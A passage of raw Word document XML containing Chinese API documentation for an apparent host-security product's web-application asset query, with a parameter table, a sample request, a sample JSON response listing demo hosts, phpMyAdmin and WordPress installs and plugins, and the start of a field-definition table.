            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290F222B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E7D7D6A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12393455" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37994FEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F9C605D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D298FC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06807AF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F41274B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="318D55A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="161B55EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31BBA39D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42002D7E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F9AFF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE081F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E644B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19E6B025" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="491F0157" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDE2181" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rootPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B80677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35DCCA57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724B2D8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1198D67B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45834A56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>webRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C79604" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD2E9F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6565E897" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>站点根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0733EB19" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F68D632" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63EE07C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DACCE9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="297EF96F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务类型，如nginx、apache、tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59BDE577" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCED467" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>domainName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B767B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="411260FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="791FF318" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6518E8E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC14F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/webapp/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC941A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABAA3E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":"12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "联系",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "webRoot":"/usr/share/nginx/html/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serverName":"nginx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "domainName":"192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pluginCount":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "appName":"phpMyAdmin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description":"phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rootPath":"/usr/share/nginx/html/phpMyAdmin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "plugins":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"192.168.126.203",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"192.168.126.203",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":"安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签b"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"oldtcm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version":"4.5.3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "webRoot":"/var/www/html/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serverName":"httpd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "domainName":"www.qingtengdemoapache.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pluginCount":4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "appName":"WordPress",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "description":"WordPress是一种使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rootPath":"/var/www/html/wordpress",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "plugins":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginName":"JQuery Html5 File Upload",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginUri":"http://wordpress.org/extend/plugins/jquery-html5-file-upload/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "description":"This plugin adds a file upload functionality to the front-end screen. It allows multiple file upload asynchronously along with upload status bar.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"sinashshajahan",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "authorUri":" ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"3.0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginName":"Roomcloud",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginUri":"http://www.roomcloud.net",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "description":"A Plugin to add roomcloud booking form to hotel website using [roomcloud] shortcode",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"Raffaello Bindi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "authorUri":"http://www.roomcloud.net",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"1.3"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginName":"Hello Dolly",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "pluginUri":"http://wordpress.org/plugins/hello-dolly/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "description":"This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from &lt;cite&gt;Hello, Dolly&lt;/cite&gt; in the upper right of your admin screen on every page.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"Matt Mullenweg",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "authorUri":"http://ma.tt/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"1.6"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginName":"Akismet",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "pluginUri":"https://akismet.com/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "description":"Used by millions, Akismet is quite possibly the best way in the world to &lt;strong&gt;protect your blog from spam&lt;/strong&gt;. It keeps your site protected even while you sleep. To get started: 1) Click the \"Activate\" link to the left of this description, 2) &lt;a href=\"https://akismet.com/get/\"&gt;Sign up for an Akismet plan&lt;/a&gt; to get an API key, and 3) Go to your Akismet configuration page, and save your API key.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "author":"Automattic",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "authorUri":"https://automattic.com/wordpress-plugins/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version":"3.1.11"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752DC115"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521"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="3984"/>
        <w:gridCol w:w="3622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0D903DA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755345E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC6F02A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF83207" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A42E47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FB02955" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="719ACE31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE51E6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22CCC903" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25483F46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13EB8208" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="042E97F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A88C2C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA47920" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FC782A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33DE2837" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE82613" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01099773" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6803C382" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73703CEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5551D946" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB990D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F626D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F3C58C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792681E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2301062A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40093D5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
